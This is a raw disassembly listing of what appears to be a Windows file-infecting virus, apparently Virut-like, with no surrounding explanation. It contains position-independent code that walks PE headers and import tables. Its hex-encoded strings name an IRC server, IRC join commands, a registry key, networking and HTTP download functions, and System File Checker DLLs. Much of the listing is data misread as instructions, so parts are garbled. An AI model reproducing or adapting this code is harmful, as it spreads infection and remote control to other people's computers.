add [ebx+65h], dl
jz short near ptr loc_47E7C5+2
loc_47E781: ; CODE XREF: sub_47E5AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_47E78C: ; CODE XREF: sub_47E5AF+173�j
; sub_47E5AF+170�j
db 65h
jnb short loc_47E7D0
loc_47E78F: ; CODE XREF: sub_47E5AF+188�j
add [ebx+65h], dl
jz short loc_47E7DA
loc_47E794: ; CODE XREF: sub_47E5AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_47E818
jz short loc_47E80C
insd
push esp
loc_47E7A9: ; CODE XREF: sub_47E5AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_47E813
imul esp, [ebp+77h], 6946664Fh
insb
loc_47E7C5: ; CODE XREF: sub_47E5AF+1D0�j
add gs:[esi+69h], dl
loc_47E7C9: ; CODE XREF: sub_47E5AF+1AA�j
jb short near ptr loc_47E83E+1
jnz short loc_47E82E
insb
inc ecx
insb
loc_47E7D0: ; CODE XREF: sub_47E5AF:loc_47E78C�j
insb
outsd
loc_47E7D2: ; CODE XREF: sub_47E5AF+1B2�j
arpl [eax], ax
push edi
jb short loc_47E840
jz short loc_47E83E
inc esi
loc_47E7DA: ; CODE XREF: sub_47E5AF+1E3�j
; sub_47E5AF:loc_47E76B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_47E85A
push eax
jb short near ptr loc_47E84F+3
jbe short near ptr loc_47E84F+5
insb
loc_47E7EC: ; CODE XREF: sub_47E5AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 0E845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_47E83B+1
jb short near ptr loc_47E85F+1
popa
jz short loc_47E863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_47E870
push eax
loc_47E80C: ; CODE XREF: sub_47E5AF+1F6�j
jb short loc_47E87D
arpl [ebp+73h], sp
jnb short $+2
loc_47E813: ; CODE XREF: sub_47E5AF+20C�j
dec esi
jz short near ptr loc_47E856+3
jb short loc_47E87D
loc_47E818: ; CODE XREF: sub_47E5AF+1F4�j
popa
jz short loc_47E880
push eax
jb short loc_47E88D
arpl [ebp+73h], sp
jnb short near ptr loc_47E863+5
js short $+2
dec esi
jz short loc_47E86B
jb short loc_47E88F
popa
jz short near ptr loc_47E88F+3
push ebx
loc_47E82E: ; CODE XREF: sub_47E5AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_47E89E+1
popa
loc_47E83B: ; CODE XREF: sub_47E5AF+248�j
jz short loc_47E8A2
push ebp
loc_47E83E: ; CODE XREF: sub_47E5AF+228�j
; sub_47E5AF:loc_47E7C9�j
jnb short near ptr loc_47E8A4+1
loc_47E840: ; CODE XREF: sub_47E5AF+226�j
jb short near ptr loc_47E88F+3
jb short loc_47E8B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_47E899
popa
jo short near ptr loc_47E8A4+1
loc_47E84F: ; CODE XREF: sub_47E5AF+238�j
; sub_47E5AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_47E856: ; CODE XREF: sub_47E5AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_47E85A: ; CODE XREF: sub_47E5AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_47E85F: ; CODE XREF: sub_47E5AF+24A�j
jo short loc_47E8C6
outsb
inc esi
loc_47E863: ; CODE XREF: sub_47E5AF+24D�j
; sub_47E5AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_47E86B: ; CODE XREF: sub_47E5AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_47E8DF
loc_47E870: ; CODE XREF: sub_47E5AF+25A�j
arpl [ebp+73h], sp
jnb short loc_47E8C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_47E8CB+1
loc_47E87D: ; CODE XREF: sub_47E5AF:loc_47E80C�j
; sub_47E5AF+267�j
jo short near ptr loc_47E8E3+1
outsb
loc_47E880: ; CODE XREF: sub_47E5AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_47E8FB+1
loc_47E88D: ; CODE XREF: sub_47E5AF+26D�j
jz short near ptr loc_47E8F3+1
loc_47E88F: ; CODE XREF: sub_47E5AF+279�j
; sub_47E5AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_47E909
jnz short near ptr loc_47E8F7+1
insb
dec ebp
loc_47E899: ; CODE XREF: sub_47E5AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_47E914+3
loc_47E89E: ; CODE XREF: sub_47E5AF+289�j
add [esi+74h], cl
push ecx
loc_47E8A2: ; CODE XREF: sub_47E5AF:loc_47E83B�j
jnz short loc_47E909
loc_47E8A4: ; CODE XREF: sub_47E5AF:loc_47E83E�j
; sub_47E5AF+29E�j
jb short near ptr loc_47E91E+1
dec ecx
outsb
outsw
jb short near ptr loc_47E918+1
popa
jz short loc_47E918
outsd
outsb
push esp
outsd
loc_47E8B3: ; CODE XREF: sub_47E5AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_47E90F+2
jb short loc_47E925
jz short near ptr loc_47E922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_47E8C6: ; CODE XREF: sub_47E5AF:loc_47E85F�j
db 65h
insd
outsd
loc_47E8C9: ; CODE XREF: sub_47E5AF+2C4�j
jb short loc_47E944
loc_47E8CB: ; CODE XREF: sub_47E5AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_47E941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_47E8DF: ; CODE XREF: sub_47E5AF+2BF�j
outsb
jnb short near ptr loc_47E94A+1
push ebx
loc_47E8E3: ; CODE XREF: sub_47E5AF:loc_47E87D�j
jz short loc_47E957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_47E950
jb short loc_47E965
jnz short near ptr loc_47E962+1
loc_47E8F3: ; CODE XREF: sub_47E5AF:loc_47E88D�j
add [ebx+6Ch], ah
outsd
loc_47E8F7: ; CODE XREF: sub_47E5AF+2E6�j
jnb short loc_47E95E
jnb short near ptr loc_47E969+1
loc_47E8FB: ; CODE XREF: sub_47E5AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_47E909: ; CODE XREF: sub_47E5AF+2E4�j
; sub_47E5AF:loc_47E8A2�j
db 65h
jz short near ptr loc_47E973+1
outsd
jnb short near ptr loc_47E981+2
loc_47E90F: ; CODE XREF: sub_47E5AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_47E914: ; CODE XREF: sub_47E5AF+2ED�j
add gs:[edx+65h], dh
loc_47E918: ; CODE XREF: sub_47E5AF+2FE�j
; sub_47E5AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_47E981+1
outsb
loc_47E91E: ; CODE XREF: sub_47E5AF:loc_47E8A4�j
add fs:[ebx+6Fh], dh
loc_47E922: ; CODE XREF: sub_47E5AF+30D�j
arpl [ebx+65h], bp
loc_47E925: ; CODE XREF: sub_47E5AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_47E990
jb short loc_47E99B
db 65h
jz short loc_47E973
insb
outsd
jnb short near ptr loc_47E998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_47E9A4
jb short near ptr loc_47E9AE+1
loc_47E941: ; CODE XREF: sub_47E5AF+329�j
db 65h
jz short loc_47E98B
loc_47E944: ; CODE XREF: sub_47E5AF:loc_47E8C9�j
db 65h
jz short loc_47E98A
outsd
outsb
outsb
loc_47E94A: ; CODE XREF: sub_47E5AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_47E950: ; CODE XREF: sub_47E5AF+33E�j
jz short near ptr loc_47E9B2+1
jz short loc_47E9B9
add [ecx+6Eh], cl
loc_47E957: ; CODE XREF: sub_47E5AF:loc_47E8E3�j
jz short near ptr loc_47E9BC+2
jb short loc_47E9C9
db 65h
jz short near ptr loc_47E9AB+2
loc_47E95E: ; CODE XREF: sub_47E5AF:loc_47E8F7�j
jo short loc_47E9C5
outsb
inc ecx
loc_47E962: ; CODE XREF: sub_47E5AF+342�j
add [ecx+6Eh], cl
loc_47E965: ; CODE XREF: sub_47E5AF+340�j
jz short near ptr loc_47E9CB+1
jb short loc_47E9D7
loc_47E969: ; CODE XREF: sub_47E5AF+34A�j
db 65h
jz short near ptr loc_47E9BA+1
jo short loc_47E9D3
outsb
push ebp
jb short near ptr loc_47E9DC+2
inc ecx
loc_47E973: ; CODE XREF: sub_47E5AF+37E�j
; sub_47E5AF:loc_47E909�j
add [ecx+6Eh], cl
jz short near ptr loc_47E9DC+1
jb short loc_47E9E8
db 65h
jz short near ptr loc_47E9CE+1
db 65h
popa
db 64h
inc esi
loc_47E981: ; CODE XREF: sub_47E5AF+36C�j
; sub_47E5AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_47E98A: ; CODE XREF: sub_47E5AF:loc_47E944�j
dec ecx
loc_47E98B: ; CODE XREF: sub_47E5AF:loc_47E941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_47E990: ; CODE XREF: sub_47E5AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_47E998: ; CODE XREF: sub_47E5AF+383�j
jnb short near ptr loc_47E9FD+2
dec ebx
loc_47E99B: ; CODE XREF: sub_47E5AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_47EA09
loc_47E9A4: ; CODE XREF: sub_47E5AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_47E9EC+2
js short loc_47E9EC
loc_47E9AB: ; CODE XREF: sub_47E5AF+3AC�j
add [edx+65h], dl
loc_47E9AE: ; CODE XREF: sub_47E5AF+390�j
db 67h
push ecx
jnz short loc_47EA17
loc_47E9B2: ; CODE XREF: sub_47E5AF:loc_47E950�j
jb short near ptr loc_47EA2C+1
push esi
popa
insb
jnz short near ptr loc_47EA1D+1
loc_47E9B9: ; CODE XREF: sub_47E5AF+3A3�j
inc ebp
loc_47E9BA: ; CODE XREF: sub_47E5AF:loc_47E969�j
js short loc_47E9FD
loc_47E9BC: ; CODE XREF: sub_47E5AF:loc_47E957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_47EA1A
popa
loc_47E9C5: ; CODE XREF: sub_47E5AF:loc_47E95E�j
insb
jnz short near ptr loc_47EA2C+1
inc ebp
loc_47E9C9: ; CODE XREF: sub_47E5AF+3AA�j
js short loc_47EA0C
loc_47E9CB: ; CODE XREF: sub_47E5AF:loc_47E965�j
add [esi+33h], dl
loc_47E9CE: ; CODE XREF: sub_47E5AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_47E9D3: ; CODE XREF: sub_47E5AF+3BD�j
mov edx, esp
push 1
loc_47E9D7: ; CODE XREF: sub_47E5AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_47E9DC: ; CODE XREF: sub_47E5AF+3C7�j
; sub_47E5AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_47E9E8: ; CODE XREF: sub_47E5AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_47E9EC: ; CODE XREF: sub_47E5AF+3FA�j
; sub_47E5AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_47E5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ;
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_47E9FD: ; CODE XREF: sub_47E5AF:loc_47E9BA�j
; sub_47E5AF:loc_47E998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ;
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_47E5AF
loc_47EA09: ; CODE XREF: sub_47E5AF+3F3�j
add [edx+5], ch
loc_47EA0C: ; CODE XREF: sub_47E5AF:loc_47E9C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_47EA17: ; CODE XREF: sub_47E5AF+401�j
push esp
push 40h
loc_47EA1A: ; CODE XREF: sub_47E5AF+412�j
push ecx
push edx
push ebx
loc_47EA1D: ; CODE XREF: sub_47E5AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_47EA2C: ; CODE XREF: sub_47E5AF:loc_47E9B2�j
; sub_47E5AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_47E5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ;
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ;
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ;
db 0C4h ;
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ;
db 0C0h ;
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ;
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ;
db 0C4h ;
db 20h
db 33h ; 3
db 0D2h ;
db 85h ;
db 0C0h ;
db 0Fh
db 99h ;
db 0C2h ;
db 0F7h ;
db 0DAh ;
db 58h ; X
db 23h ; #
db 0C2h ;
db 0C3h ;
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ;
db 0C1h ;
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ;
db 0A5h ;
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ;
db 0D4h ;
db 6Ah ; j
db 0
db 8Bh ;
db 0CCh ;
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ;
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ;
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ;
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ;
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ;
db 0Ch
db 8Dh ;
db 95h ;
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ;
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ;
db 8Bh ;
db 85h ;
db 0FEh ;
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ;
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ;
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ;
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ;
db 0F4h ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ;
db 29h ; )
db 0
db 0
db 0E8h ;
db 0DFh ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 0C7h ;
db 5Fh ; _
db 0C3h ;
db 55h ; U
db 0E8h ;
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 656F7477h
dd 7870716Ch, 4553550Ah, 4A6B2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
dd 3AAB5957h, 10A61429h, 7F95D1CAh, 714BC3D4h, 0D8B8B352h
dd 1Ah dup(0)
; =============== S U B R O U T I N E =======================================
sub_47F414 proc near ; CODE XREF: sub_47F4CA:loc_47F4B8�p
; sub_47F51B+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_47F430: ; CODE XREF: sub_47F414+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_47F452
cmp eax, [edx+8]
jnb short loc_47F452
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_47F457
; ---------------------------------------------------------------------------
loc_47F452: ; CODE XREF: sub_47F414+23�j
; sub_47F414+28�j
add edx, 28h
loop loc_47F430
loc_47F457: ; CODE XREF: sub_47F414+3C�j
popa
retn 4
sub_47F414 endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_47F4CA
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_47F472: ; CODE XREF: fuck:0047F479�j
cmp [eax], ebx
jz short loc_47F482
add eax, 4
loop loc_47F472
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_47F482: ; CODE XREF: fuck:0047F474�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_47F49C
loc_47F48C: ; CODE XREF: fuck:0047F494�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_47F48C
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_47F4CA
loc_47F49C: ; CODE XREF: fuck:0047F48A�j
; sub_47F4CA+34�j
cmp dword ptr [edx], 0
jz short loc_47F4A6
sub esi, [edx]
add esi, [edx+10h]
loc_47F4A6: ; CODE XREF: sub_47F4CA-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_47F4B5
push dword ptr [edx]
jmp short loc_47F4B8
; ---------------------------------------------------------------------------
loc_47F4B5: ; CODE XREF: sub_47F4CA-1B�j
push dword ptr [edx+10h]
loc_47F4B8: ; CODE XREF: sub_47F4CA-17�j
call sub_47F414
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_47F4CA
; =============== S U B R O U T I N E =======================================
sub_47F4CA proc near ; CODE XREF: fuck:0047F461�p
; FUNCTION CHUNK AT 0047F49C SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_47F51B
mov eax, [ebp+1042D0h]
call near ptr dword_47EB50+43h
call sub_47F507
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_47F500
mov [ebp+102410h], ebx
jmp short loc_47F49C
; ---------------------------------------------------------------------------
loc_47F500: ; CODE XREF: sub_47F4CA+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_47F4CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_47F507 proc near ; CODE XREF: sub_47F4CA+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_47F51B
xor ecx, ecx
retn
sub_47F507 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_47F51B proc near ; CODE XREF: sub_47F4CA+10�p
; sub_47F507+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_47F414
add edx, [ebp+1042F8h]
add edx, esi
loc_47F52F: ; CODE XREF: sub_47F51B+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_47F640
cmp dword ptr [edx+10h], 0
jz locret_47F640
mov eax, [edx+0Ch]
push eax
call sub_47F414
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_47F555: ; CODE XREF: sub_47F51B+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_47F575
cmp cl, 2Eh
jz short loc_47F564
loc_47F561: ; CODE XREF: sub_47F51B+58�j
inc eax
jmp short loc_47F555
; ---------------------------------------------------------------------------
